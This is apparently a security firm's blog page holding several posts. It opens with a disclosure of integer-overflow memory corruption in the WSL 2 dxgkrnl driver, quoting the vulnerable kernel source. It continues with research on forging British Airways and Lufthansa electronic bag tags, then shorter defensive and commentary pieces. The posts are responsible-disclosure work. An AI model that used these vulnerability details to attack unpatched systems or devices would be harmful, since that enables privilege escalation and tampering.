INSIGHTS, RESEARCH | September 11, 2020

WSL 2.0 dxgkrnl Driver Memory Corruption

The year 2020 has been a disaster of biblical proportions. Old Testament, real wrath of God type stuff. Fire and brimstone coming down from the skies! Rivers and seas boiling! Forty years of darkness, earthquakes, volcanoes, the dead rising from the grave! Human sacrifices, dogs and cats living together…mass hysteria and reporting Linux kernel bugs to Microsoft!? I thought I would write up a quick blog post explaining the following tweet and walk through a memory corruption flaw reported to MSRC that was recently fixed.

Back in May, before Alex Ionescu briefly disappeared from the Twitter-verse causing a reactionary slew of conspiracy theories, he sent out this tweet calling out the dxgkrnl driver. That evening it was brought to my attention by my buddy Ilja van Sprundel. Ilja has done a lot of driver research over the years, some involving Windows kernel graphics drivers. The announcement of dxgkrnl was exciting and piqued our interest regarding the new attack surface it opens up. So we decided to quickly dive into it and race to find bugs. When examining kernel drivers the first thing I head to are the IOCTL (Input/Output Control) handlers. IOCTL handlers allow users to communicate with the driver via the ioctl syscall. This is a prime attack surface because the driver is going to be handling userland-provided data within kernel space. Looking into drivers/gpu/dxgkrnl/ioctl.c the following function is at the bottom, showing us a full list of the IOCTL handlers that we want to analyze.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
void ioctl_desc_init(void)
{
    memset(ioctls, 0, sizeof(ioctls));
    SET_IOCTL(/*0x1 */ dxgk_open_adapter_from_luid,
          LX_DXOPENADAPTERFROMLUID);
    SET_IOCTL(/*0x2 */ dxgk_create_device,
          LX_DXCREATEDEVICE);
    SET_IOCTL(/*0x3 */ dxgk_create_context,
          LX_DXCREATECONTEXT);
    SET_IOCTL(/*0x4 */ dxgk_create_context_virtual,
          LX_DXCREATECONTEXTVIRTUAL);
    SET_IOCTL(/*0x5 */ dxgk_destroy_context,
          LX_DXDESTROYCONTEXT);
    SET_IOCTL(/*0x6 */ dxgk_create_allocation,
          LX_DXCREATEALLOCATION);
    SET_IOCTL(/*0x7 */ dxgk_create_paging_queue,
          LX_DXCREATEPAGINGQUEUE);
    SET_IOCTL(/*0x8 */ dxgk_reserve_gpu_va,
          LX_DXRESERVEGPUVIRTUALADDRESS);
    SET_IOCTL(/*0x9 */ dxgk_query_adapter_info,
          LX_DXQUERYADAPTERINFO);
    SET_IOCTL(/*0xa */ dxgk_query_vidmem_info,
          LX_DXQUERYVIDEOMEMORYINFO);
    SET_IOCTL(/*0xb */ dxgk_make_resident,
          LX_DXMAKERESIDENT);
    SET_IOCTL(/*0xc */ dxgk_map_gpu_va,
          LX_DXMAPGPUVIRTUALADDRESS);
    SET_IOCTL(/*0xd */ dxgk_escape,
          LX_DXESCAPE);
    SET_IOCTL(/*0xe */ dxgk_get_device_state,
          LX_DXGETDEVICESTATE);
    SET_IOCTL(/*0xf */ dxgk_submit_command,
          LX_DXSUBMITCOMMAND);
    SET_IOCTL(/*0x10 */ dxgk_create_sync_object,
          LX_DXCREATESYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x11 */ dxgk_signal_sync_object,
          LX_DXSIGNALSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x12 */ dxgk_wait_sync_object,
          LX_DXWAITFORSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x13 */ dxgk_destroy_allocation,
          LX_DXDESTROYALLOCATION2);
    SET_IOCTL(/*0x14 */ dxgk_enum_adapters,
          LX_DXENUMADAPTERS2);
    SET_IOCTL(/*0x15 */ dxgk_close_adapter,
          LX_DXCLOSEADAPTER);
    SET_IOCTL(/*0x16 */ dxgk_change_vidmem_reservation,
          LX_DXCHANGEVIDEOMEMORYRESERVATION);
    SET_IOCTL(/*0x17 */ dxgk_create_hwcontext,
          LX_DXCREATEHWCONTEXT);
    SET_IOCTL(/*0x18 */ dxgk_create_hwqueue,
          LX_DXCREATEHWQUEUE);
    SET_IOCTL(/*0x19 */ dxgk_destroy_device,
          LX_DXDESTROYDEVICE);
    SET_IOCTL(/*0x1a */ dxgk_destroy_hwcontext,
          LX_DXDESTROYHWCONTEXT);
    SET_IOCTL(/*0x1b */ dxgk_destroy_hwqueue,
          LX_DXDESTROYHWQUEUE);
    SET_IOCTL(/*0x1c */ dxgk_destroy_paging_queue,
          LX_DXDESTROYPAGINGQUEUE);
    SET_IOCTL(/*0x1d */ dxgk_destroy_sync_object,
          LX_DXDESTROYSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x1e */ dxgk_evict,
          LX_DXEVICT);
    SET_IOCTL(/*0x1f */ dxgk_flush_heap_transitions,
          LX_DXFLUSHHEAPTRANSITIONS);
    SET_IOCTL(/*0x20 */ dxgk_free_gpu_va,
          LX_DXFREEGPUVIRTUALADDRESS);
    SET_IOCTL(/*0x21 */ dxgk_get_context_process_scheduling_priority,
          LX_DXGETCONTEXTINPROCESSSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x22 */ dxgk_get_context_scheduling_priority,
          LX_DXGETCONTEXTSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x23 */ dxgk_get_shared_resource_adapter_luid,
          LX_DXGETSHAREDRESOURCEADAPTERLUID);
    SET_IOCTL(/*0x24 */ dxgk_invalidate_cache,
          LX_DXINVALIDATECACHE);
    SET_IOCTL(/*0x25 */ dxgk_lock2,
          LX_DXLOCK2);
    SET_IOCTL(/*0x26 */ dxgk_mark_device_as_error,
          LX_DXMARKDEVICEASERROR);
    SET_IOCTL(/*0x27 */ dxgk_offer_allocations,
          LX_DXOFFERALLOCATIONS);
    SET_IOCTL(/*0x28 */ dxgk_open_resource,
          LX_DXOPENRESOURCE);
    SET_IOCTL(/*0x29 */ dxgk_open_sync_object,
          LX_DXOPENSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x2a */ dxgk_query_alloc_residency,
          LX_DXQUERYALLOCATIONRESIDENCY);
    SET_IOCTL(/*0x2b */ dxgk_query_resource_info,
          LX_DXQUERYRESOURCEINFO);
    SET_IOCTL(/*0x2c */ dxgk_reclaim_allocations,
          LX_DXRECLAIMALLOCATIONS2);
    SET_IOCTL(/*0x2d */ dxgk_render,
          LX_DXRENDER);
    SET_IOCTL(/*0x2e */ dxgk_set_allocation_priority,
          LX_DXSETALLOCATIONPRIORITY);
    SET_IOCTL(/*0x2f */ dxgk_set_context_process_scheduling_priority,
          LX_DXSETCONTEXTINPROCESSSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x30 */ dxgk_set_context_scheduling_priority,
          LX_DXSETCONTEXTSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x31 */ dxgk_signal_sync_object_cpu,
          LX_DXSIGNALSYNCHRONIZATIONOBJECTFROMCPU);
    SET_IOCTL(/*0x32 */ dxgk_signal_sync_object_gpu,
          LX_DXSIGNALSYNCHRONIZATIONOBJECTFROMGPU);
    SET_IOCTL(/*0x33 */ dxgk_signal_sync_object_gpu2,
          LX_DXSIGNALSYNCHRONIZATIONOBJECTFROMGPU2);
    SET_IOCTL(/*0x34 */ dxgk_submit_command_to_hwqueue,
          LX_DXSUBMITCOMMANDTOHWQUEUE);
    SET_IOCTL(/*0x35 */ dxgk_submit_wait_to_hwqueue,
          LX_DXSUBMITWAITFORSYNCOBJECTSTOHWQUEUE);
    SET_IOCTL(/*0x36 */ dxgk_submit_signal_to_hwqueue,
          LX_DXSUBMITSIGNALSYNCOBJECTSTOHWQUEUE);
    SET_IOCTL(/*0x37 */ dxgk_unlock2,
          LX_DXUNLOCK2);
    SET_IOCTL(/*0x38 */ dxgk_update_alloc_property,
          LX_DXUPDATEALLOCPROPERTY);
    SET_IOCTL(/*0x39 */ dxgk_update_gpu_va,
          LX_DXUPDATEGPUVIRTUALADDRESS);
    SET_IOCTL(/*0x3a */ dxgk_wait_sync_object_cpu,
          LX_DXWAITFORSYNCHRONIZATIONOBJECTFROMCPU);
    SET_IOCTL(/*0x3b */ dxgk_wait_sync_object_gpu,
          LX_DXWAITFORSYNCHRONIZATIONOBJECTFROMGPU);
    SET_IOCTL(/*0x3c */ dxgk_get_allocation_priority,
          LX_DXGETALLOCATIONPRIORITY);
    SET_IOCTL(/*0x3d */ dxgk_query_clock_calibration,
          LX_DXQUERYCLOCKCALIBRATION);
    SET_IOCTL(/*0x3e */ dxgk_enum_adapters3,
          LX_DXENUMADAPTERS3);
    SET_IOCTL(/*0x3f */ dxgk_share_objects,
          LX_DXSHAREOBJECTS);
    SET_IOCTL(/*0x40 */ dxgk_open_sync_object_nt,
          LX_DXOPENSYNCOBJECTFROMNTHANDLE2);
    SET_IOCTL(/*0x41 */ dxgk_query_resource_info_nt,
          LX_DXQUERYRESOURCEINFOFROMNTHANDLE);
    SET_IOCTL(/*0x42 */ dxgk_open_resource_nt,
          LX_DXOPENRESOURCEFROMNTHANDLE);
}

When working through this list of functions, I eventually stumbled into dxgk_signal_sync_object_cpu which has immediate red flags. We can see that data is copied from userland into kernel space via dxg_copy_from_user() in the form of the structure d3dkmt_signalsynchronizationobjectfromcpu and the data is passed as various arguments to dxgvmb_send_signal_sync_object().

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
struct d3dkmt_signalsynchronizationobjectfromcpu {
    d3dkmt_handle device;
    uint object_count;
    d3dkmt_handle *objects;
    uint64_t  *fence_values;
    struct d3dddicb_signalflags flags;
};

static int dxgk_signal_sync_object_cpu(struct dxgprocess *process,
                       void *__user inargs)
{
    struct d3dkmt_signalsynchronizationobjectfromcpu args;
    struct dxgdevice *device = NULL;
    struct dxgadapter *adapter = NULL;
    int ret = 0;

    TRACE_FUNC_ENTER(__func__);

    ret = dxg_copy_from_user(&args, inargs, sizeof(args));  // User controlled data copied into args
    if (ret)
        goto cleanup;

    device = dxgprocess_device_by_handle(process, args.device);
    if (device == NULL) {
        ret = STATUS_INVALID_PARAMETER;
        goto cleanup;
    }

    adapter = device->adapter;
    ret = dxgadapter_acquire_lock_shared(adapter);
    if (ret) {
        adapter = NULL;
        goto cleanup;
    }

    ret = dxgvmb_send_signal_sync_object(process, &adapter->channel,        // User controlled data passed as arguments
                         args.flags, 0, 0,                              // specific interest args.object_count
                         args.object_count, args.objects, 0,
                         NULL, args.object_count,
                         args.fence_values, NULL,
                         args.device);

cleanup:

    if (adapter)
        dxgadapter_release_lock_shared(adapter);
    if (device)
        dxgdevice_release_reference(device);

    TRACE_FUNC_EXIT(__func__, ret);
    return ret;
}

The IOCTL handler dxgk_signal_sync_object_cpu lacked input validation of user-controlled data. The user passes a d3dkmt_signalsynchronizationobjectfromcpu structure which contains a uint value for object_count. Moving deeper into the code, in dxgvmb_send_signal_sync_object (drivers/gpu/dxgkrnl/dxgvmbus.c), we know that we control the following arguments at this moment and there’s been zero validation:

  • args.flags (flags)
  • args.object_count (object_count, fence_count)
  • args.objects (objects)
  • args.fence_values (fences)
  • args.device (device)

An interesting note is that args.object_count is being used for both the object_count and fence_count. Generally a count is used to calculate length, so it’s important to keep an eye out for counts that you control. You’re about to witness some extremely trivial bugs. If you’re inexperienced at auditing C code for vulnerabilities, see how many issues you can spot before reading the explanations below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
int dxgvmb_send_signal_sync_object(struct dxgprocess *process,
                   struct dxgvmbuschannel *channel,
                   struct d3dddicb_signalflags flags,
                   uint64_t legacy_fence_value,
                   d3dkmt_handle context,
                   uint object_count,
                   d3dkmt_handle __user *objects,
                   uint context_count,
                   d3dkmt_handle __user *contexts,
                   uint fence_count,
                   uint64_t __user *fences,
                   struct eventfd_ctx *cpu_event_handle,
                   d3dkmt_handle device)
{
    int ret = 0;
    struct dxgkvmb_command_signalsyncobject *command = NULL;
    uint object_size = object_count * sizeof(d3dkmt_handle);            
    uint context_size = context_count * sizeof(d3dkmt_handle);          
    uint fence_size = fences ? fence_count * sizeof(uint64_t) : 0;      
    uint8_t *current_pos;
    uint cmd_size = sizeof(struct dxgkvmb_command_signalsyncobject) +
        object_size + context_size + fence_size;

    if (context)
        cmd_size += sizeof(d3dkmt_handle);                              

    command = dxgmem_alloc(process, DXGMEM_VMBUS, cmd_size);
    if (command == NULL) {
        ret = STATUS_NO_MEMORY;
        goto cleanup;
    }

    command_vgpu_to_host_init2(&command->hdr,                     
                   DXGK_VMBCOMMAND_SIGNALSYNCOBJECT,
                   process->host_handle);

    if (flags.enqueue_cpu_event)
        command->cpu_event_handle = (winhandle) cpu_event_handle; 
    else
        command->device = device;                                     
    command->flags = flags;                                             
    command->fence_value = legacy_fence_value;                          
    command->object_count = object_count;                               
    command->context_count = context_count;                             
    current_pos = (uint8_t *) &command[1];
    ret = dxg_copy_from_user(current_pos, objects, object_size);        
    if (ret) {
        pr_err("Failed to read objects %p %d",
               objects, object_size);
        goto cleanup;
    }
    current_pos += object_size;
    if (context) {
        command->context_count++;
        *(d3dkmt_handle *) current_pos = context;
        current_pos += sizeof(d3dkmt_handle);
    }
    if (context_size) {
        ret = dxg_copy_from_user(current_pos, contexts, context_size);
        if (ret) {
            pr_err("Failed to read contexts %p %d",
                   contexts, context_size);
            goto cleanup;
        }
        current_pos += context_size;
    }
    if (fence_size) {
        ret = dxg_copy_from_user(current_pos, fences, fence_size);
        if (ret) {
            pr_err("Failed to read fences %p %d",
                   fences, fence_size);
            goto cleanup;
        }
    }

    ret = dxgvmb_send_sync_msg_ntstatus(channel, command, cmd_size);

cleanup:
    if (command)
        dxgmem_free(process, DXGMEM_VMBUS, command);
    TRACE_FUNC_EXIT_ERR(__func__, ret);
    return ret;
}

This count that we control is used in multiple locations throughout the IOCTL for buffer length calculations without validation. This leads to multiple integer overflows, followed by an allocation that is too short which causes memory corruption.

Integer overflows:

17) Our controlled value object_count is used to calculate object_size

19) Our controlled value fence_count is used to calculate fence_size

21) The final result of cmd_size is calculated using the previous object_size and fence_size values

25) cmd_size could simply overflow from adding the size of d3dkmt_handle if it were large enough

Memory corruption:

27) The result of cmd_size is ultimately used as a length calculation for dxgmem_alloc. As an attacker, we can force this to be very small.

Since our new allocated buffer command can be extremely small, the following execution that writes to it could cause memory corruption.

33-44) These are all writing data to what is pointing at the buffer, and depending on the size we force there’s no guarantee that there is space for the data.

46,59) Eventually execution will lead to two different calls of dxg_copy_from_user. In both cases, it is copying in user-controlled data using the original extremely large size values (remember our object_count was used to calculate both object_size and fence_size).

Hopefully this inspired you to take a peek at other opensource drivers and hunt down security bugs. This issue was reported to MSRC on May 20th, 2020 and resolved on August 26th, 2020 after receiving the severity of Important with an impact of Elevation of Privilege.

You can view the patch commit here with the new added validation.

INSIGHTS, RESEARCH | September 1, 2020

Breaking Electronic Baggage Tags – Lufthansa vs British Airways

If you are reading this article, I will venture to guess that you have already had the ‘pleasure’ of queuing to check a bag at an airport. In order to improve the checking procedure, Electronic Baggage Tag (EBT) solutions are being introduced on the market that leverage the new technologies most travellers have access to nowadays.

This time I will take a look at the security posture of two of the most prominent EBT solutions: British Airways’ TAG and Lufthansa’s BAGTAG.

First of all, IATA provides an implementation guide for these devices, which I recommend you read before continuing on with this blog post, as well as the IATA resolution 753 on baggage tracking.

Certain parts of the implementation guide are worth noting:

In general terms, an EBT solution is comprised of:

  • Airline mobile app
  • Airline backend
  • EBT device
    • NFC
    • BLE
    • Display (e-INK)

The communication channel between airline mobile app and the EBT is established through a BLE interface.
Now let’s see how close to the expected functionality of these EBT solutions is to the IATA security requirements.

British Airways’ TAG

British Airways’ (BA’s) TAG is provided by ViewTag. As usual, by looking at the FCCID website, we can find a teardown of the device.

The differences between the teardown version and the one being commercialized are not significant.

It is as simple as it looks. The Nordic SoC is in charge of BLE communication with the mobile app. By reverse engineering the BA app, it was possible to easily figure out how the solution is working: Basically, the BA app directly transfers the data that will be used to update the EBT display via BLE without any additional security.

A custom payload written to the ‘PASS_DATA’ characteristic is the mechanism used to transfer the boarding pass/bag tag data that eventually will be rendered on the EBT device’s e-INK display. The device does not validate either the authenticity or the integrity of the data being transferred. The following code receives the booking information collected from the BA backend and generates the payload:

The payload is a string where the following items are concatenated in a specific order.

  • passengerName
  • bookingReference
  • priority
  • sequenceNumber
  • destinationFlightNum
  • destinationFlightDate (ddHHmm)
  • destinationAirport
  • destinationName
  • firstTransferFlightNum
  • firstTransferFlightDate
  • firstTransferAirport
  • secondTransferFlightNum
  • secondTransferFlightDate
  • secondTransferAirport
  • departureAirport
  • euDeparture (enable green bars)
  • fullIdentifier

That’s it, not very interesting I know…

The above diagram sums up the overall implementation:

  1. The BA app downloads the passenger’s booking info and checks the ability to generate a digital bag tag (only available to Executive Club members).
  2. The BA app generates the bag tag payload and transfers it through the PASS_DATA characteristic
  3. The EBT processes this payload and updates the e-INK display with the received information.

As a result of this design, anyone, not only the airline, is able to forge arbitrary bag tags and update the EBT device without any further interaction with BA. Obviously you still require physical access to the EBT device to press the button that will enable the BLE functionality.

The following proof-of-concept can be used to forge arbitrary bag tags and render them on a BA TAG.

File: poc.py

The following is a custom bag tag generated using this PoC:

Lufthansa’s BAGTAG

Lufthansa decided to go with DSTAGS, a company founded by an NXP employee. This company created BAGTAG. I think it is worth mentioning this detail because my analysis revealed that the team behind the device seems to have significant experience with NXP components, although from a security perspective they missed some basic things.

As with the TAG solution, we can access a device teardown on the FCCID site, which is almost identical to the units used during the analysis.

The main components are:

  • Nordic NRF8001 – BLE SoC
  • NXP LPC115F – MCU
  • NXP 7001C – Secure Element

As the following image shows, the Serial Wire Debug (SWD) headers were easily accessible, so that was the first thing to check.

Fortunately, the BAGTAG production units are being commercialized without enforcing any type of Code Read Protection (CRP) scheme in their MCUs. As a result, it was possible to gain complete access to the firmware, as well as to flash a new one (I used a PEmicro Multilink working with the NXP’s MCUxpresso built-in gdb server).

After reverse engineering the firmware (bare metal, no symbols, no strings) and the app, it was clear that this solution was much more complex and solid than BA’s. Basically, the BAGTAG solution implements a chip-to-cloud scheme using the NDA-protected NXP 7001C Secure Element, which contains the cryptographic materials required both to uniquely identify the EBT and to decrypt the responses received from the BAGTAG backend. The MCU communicates with the Lufthansa app through the NRF8001 BLE transceiver.

I came up with the following diagram to help elaborate the main points of interest.

  • 1. The Lufthansa app downloads the passenger’s booking info and checks whether the user wants to generate an EBT.
  • 2. The BAGTAG’s BLE service exposes two characteristics (receiveGUID and transmitGUID) that are basically used to transfer data between the app and the device.

Actually the important data comes encrypted directly from the BAGTAG cloud. In addition to the passthrough channel, there are two publicly supported commands:

The startSessionRequest returns an internal 59-byte ‘ID’ that identifies that specific BAGTAG device. This ID is stored inside the NXP 7001 Secure Element, which communicates with the MCU via I2C using an ISO-7816-compliant protocol.

There are two commands invoked in the firmware for the selected applet:

  • 0x8036: Returns the Session ID and uCode (to generate the IATA’s GUID)
  • 0x8022: Decrypt data (received from the BAGTAG backend through the BLE passthrough)

  • 3. The user needs to register the BAGTAG device and create an account. Then the app serializes the booking info required to generate a valid BAGTAG (pretty much the same fields that were mentioned for BA’s solution) and submits it to the BAGTAG backend to be validated. If everything is correct, the BAGTAG backend returns an encrypted blob that goes through the BLE passthrough channel directly to the BAGTAG device.
  • 4. The MCU receives this encrypted blob and sends it to the 7001C Secure Element to be decrypted. The decrypted data received from the 7001C via I2C is then processed, eventually updating the e-INK display with this information.

It is worth mentioning that I didn’t perform any live tests on the Internet-facing servers to avoid any unexpected behaviors in the production environments.

At the intra-board communication level, the MCU does not implement a secure channel to talk to the NXP 7001C Secure Element. As a result, a malicious component on the I2C bus could provide arbitrary content that will eventually be rendered, as the MCU has no way of validating whether it came from the actual 7001C. Obviously, malicious firmware running in the BAGTAG device may perform the same actions without requiring an external component.

Intra-board attacks (SPI, I2C, etc.) are really interesting in those scenarios where the MCU offloads a specific functionality (network, crypto, radio, etc.) to a certain SoC. If you are into this kind of attacks, stay tuned 😉

For instance, we can see how this lack of intra-board security can also lead to a memory corruption vulnerability in this firmware:

See the issue?

At line 58 ‘transfer_to_i2c’ expects to read v12+2 bytes from the I2C slave, storing them at 0x100011A4. Then at line 63, it is using a byte that may be controlled by an attacker to calculate the number of bytes that will be copied in the memcpy operation. Now, if that byte is 0x00, we will face a wild memcpy corruption scenario.

Conclusions

Lufthansa and British Airways were notified of these issues. Both consider these issues as low-risk threats.

British Airways

“Through our own internal investigations we have validated that there are enough checks in the background that take place to ensure an unauthorised bag would not make it through.

The potential exploitation scenarios are overall really unlikely. The overall risk to the businesses is also considered to be low severity.”

Lufthansa

“From a security standpoint appropriate screening of hold baggage remains by far the most important pillar.

In addition the baggage handling process is robust against many forms of manipulation.

The manipulation by means of EBT is therefore only a supplement to already considered cases and does not mean a significant increase of the attacksurface.

In this respect, there is only a small additional probability of occurrence.

A piece of luggage manipulated via Bluetooth would be identified and transferred to a verification process.

This ensures that no luggage manipulated in this way can get on board of one of our aircrafts.

Lufthansa thanks the researcher for his cooperation.

We will gladly follow up such indications, among other things by means of our BugBounty program.”

I agree, there are serious limitations to turning these issues into a serious attack scenario; however, time will tell how these technologies evolve. Hopefully this kind of research will help to close any security gaps before a more significant attack vector can be discovered.

References

  1. https://www.iata.org/en/publications/ebt-guide/
  2. https://www.iata.org/en/programs/ops-infra/baggage/baggage-tracking/
  3. https://viewtag.com/
  4. https://fccid.io/NOI-VGIDEBT/Internal-Photos/Internal-photos-4145161
  5. https://fccid.io/2AK3S-BAGTAG/Internal-Photos/Internal-photographs-3391010
  6. https://www.nxp.com/docs/en/data-sheet/LPC111X.pdf
  7. http://www.pemicro.com/products/product_viewDetails.cfm?product_id=15320168&productTab=1
  8. https://www.nxp.com/design/software/development-software/mcuxpresso-software-and-tools-/mcuxpresso-integrated-development-environment-ide:MCUXpresso-IDE
INSIGHTS | October 17, 2018

Smart Cities: Cybersecurity Worries

Infodocument providing a visual exploration into the growing security concerns of smart city technologies. Featuring detail to the myriad technologies, problems, threats, possible targets, as well as current examples of cities having experienced attacks.

INSIGHTS | October 23, 2017

Embedding Defense in Server-side Applications

Applications always contain security flaws, which is why we rely on multiple layers of defense. Applications are still struggling with their defenses, even though we go through exhaustive measures of testing and defense layers. Perhaps we should rethink our approach to application defense, with the goal of introducing defensive methods that cause attackers to cease, or induce them to take incorrect actions based on false premises.

 

There are a variety of products that provide valuable resources when basic, off-the-shelf protection is required or the application source code is not available. However, implementations in native code provide a greater degree of defense that cannot be achieved using third-party solutions. This document aims to:
  • Enumerate a comprehensive list of current and new defensive techniques.
    Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.

 

  • Enumerate methods to identify attack tools before they can access functionalities.
    The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that the specific tool would trigger automatically.

 

  • Disclose how to detect attacker techniques within code.
    Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.

 

  • Provide a new defensive approach.
    Server-side defense is normally about blocking malicious IP addresses associated to attackers; however, an attacker’s focus can be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.

 

  • Provide these protections for multiple programming languages.
    This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP.
Fernando Arnaboldi appeared at Ruxcon to present defensive techniques that can be embedded in server-side applications. The techniques described are included in a specification, along with sample implementations for multiple programming languages.
INSIGHTS | September 7, 2017

The Other Side of Cloud Data Risk

What I’m writing here isn’t about whether you should be in the cloud or not. That’s a complex question, it’s highly dependent on your business, and experts could still disagree even after seeing all of the inputs

What I want to talk about is two distinct considerations when looking at the risk of moving your entire company to the cloud. There are many companies doing this, especially in the Bay Area. CRM, HR, Email—it’s all cloud, and the number of cloud vendors totals in the hundreds, perhaps even thousands.

We’re pretty familiar with one type of risk, which is that between the internet and the cloud vendor. That list of risks looks something like this:

  • The vendor is compromised due to a vulnerability
  • An insider at the vendor leaves with a bunch of data and sells or posts it
  • Someone at the vendor misconfigures something and the internet finds it

The list goes on from there.

But the side of that cloud/vendor risk that companies don’t seem to be as aware of is their own insider access: while one risk is that the vendor does something stupid with your data, another is that your own employees do the same.

Considerations around insider access are numerous:

  • Employees with way too much access to sales, customer, employee, financial, and other types of data
  • No ability to know whether that data is being downloaded, by whom, and how much
  • No ability to detect that data on endpoints
  • No control of which endpoints access the data
  • No ability to control where that data is then sent

The situation in so many cloud-based companies is that they enable business by providing access to these cloud systems, but they don’t control which endpoints can reach that data. Users may get in through web apps, mobile apps, or other means. It’s application-based authentication that doesn’t know (or care) what type of device is being used: a 12-year-old desktop with XP on it, or an old Android device that hasn’t been updated in months or years.

Even worse is the false sense of security gained from spending millions on firewall infrastructure, while a massive percentage of the workforce either doesn’t work at the office or doesn’t hairpin back into the office through a VPN. The modern workforce—especially in these types of environments—increasingly connects from a laptop at home (or at a co-work site or coffee shop) directly to the backend, which is the cloud.

This puts us increasingly in a situation where most of the NetSec products we’ve been investing in for the last 15 years are moot, for the simple reason that fewer and fewer people are using the corporate network.

For cloud-based companies especially, it’s time to start thinking about AuthZ and AuthN from not just the user and app perspective, but from a complete endpoint perspective. What is the device, OS, patch levels, malware controls, etc., combined with the user auth, for any given access to an application and the data within?

The risk from a compromised vendor is significant, but it’s also largely outside of a company’s control. Anyone who’s been in security for a while knows that there are thousands of companies with X, Y, or Z certifications, or positive audit results when they absolutely shouldn’t have passed. It’s really hard to know how safe your data is when it’s sitting with hundreds of cloud vendors.

What you can do is to get better control over what your own people are doing with that same data, and that starts with understanding who’s accessing it, and from what devices.

 

INSIGHTS | June 28, 2017

WannaCry vs. Petya: Keys to Ransomware Effectiveness

With WannaCry and now Petya we’re beginning to see how and why the new strain of ransomware worms are evolving and growing far more effective than previous versions.

I think there are 3 main factors: Propagation, Payload, and Payment.*

  1. Propagation: You ideally want to be able to spread using as many different types of techniques as you can.
  2. Payload: Once you’ve infected the system you want to have a payload that encrypts properly, doesn’t have any easy bypass to decryption, and clearly indicates to the victim what they should do next.
  3. Payment: You need to be able to take in money efficiently and then actually decrypt the systems of those who pay. This piece is crucial, otherwise people will quickly learn they can’t get their files back even if they do pay and be inclined to just start over.


WannaCry vs. Petya

WannaCry used SMB as its main spreading mechanism, and its payment infrastructure lacked the ability to scale. It also had a kill switch, which was famously triggered and halted further propagation.

Petya on the other hand appears to be much more effective at spreading since it’s using both EternalBlue and credential sharing
/ PSEXEC to infect more systems. This means it can harvest working credentials and spread even if the new targets aren’t vulnerable to an exploit.


[NOTE: This is early analysis so some details could turn out to be different as we learn more.]

What remains to be seen is how effective the payload and payment infrastructures are on this one. It’s one thing to encrypt files, but it’s something else entirely to decrypt them.

The other important unknown at this point is if Petya is standalone or a component of a more elaborate attack. Is what we’re seeing now intended to be a compelling distraction?
  
There’s been some reports indicating these exploits were utilized by a sophisticated threat actor against the same targets prior to WannaCry. So it’s possible that WannaCry was poorly designed on purpose. Either way, we’re advising clients to investigate if there is any evidence of a more strategic use of these tools in the weeks leading up to Petya hitting.   

*Note: I’m sure there are many more thorough ways to analyze the efficacy of worms. These are just three that came to mind while reading about Petya and thinking about it compared to WannaCry.

INSIGHTS | May 20, 2017

Post #WannaCry Reaction #127: Do I Need a Pen Test?

In the wake of WannaCry and other recent events, everyone from the Department of Homeland Security to my grandmother is recommending penetration tests as a silver bullet to prevent falling victim to the next cyberattack. But a penetration test is not a silver bullet, nor is it universally what is needed for improving the security posture of an organization. There are several key factors to consider. So I thought it might be good to review the difference between a penetration test and a vulnerability assessment since this is a routine source of confusion in the market. In fact, I’d venture to say that while there is a lot of good that comes from a penetration test, what people actually more often need is a vulnerability assessment.

First, let’s get the vocabulary down:

Vulnerability Assessments

Vulnerability Assessments are designed to yield a prioritized list of vulnerabilities and are generally best for organizations that understand they are not where they want to be in terms of security. The customer already knows they have issues and need help identifying and prioritizing them.

With a vulnerability assessment, the more issues identified the better, so naturally, a white box approach should be embraced when possible. The most important deliverable of the assessment is a prioritized list of vulnerabilities identified (and often information on how best to remediate).

Penetration Tests

Penetration Tests are designed to achieve a specific, attacker-simulated goal and should be requested by organizations that are already at their desired security posture. A typical goal could be to access the contents of the prized customer database on the internal network or to modify a record in an HR system.

The deliverable for a penetration test is a report on how security was breached in order to reach the agreed-upon goal (and often information on how best to remediate).

Why does it matter? In short, you get what you pay for. 

No organization has an unlimited budget for security. Every security dollar spent is a trade-off. For organizations that do not have a highly developed security program in place, vulnerability assessments will provide better value in terms of knowing where you need to improve your security posture even though pen tests are generally a less expensive option. A pen test is great when you know what you are looking for or want to test whether a remediation is working and has solved a particular vulnerability.

Here is a quick chart to help determine what your organization may need.

VULNERABILITY ASSESSMENT
PENETRATION TEST
Organizational Security Program Maturity Level
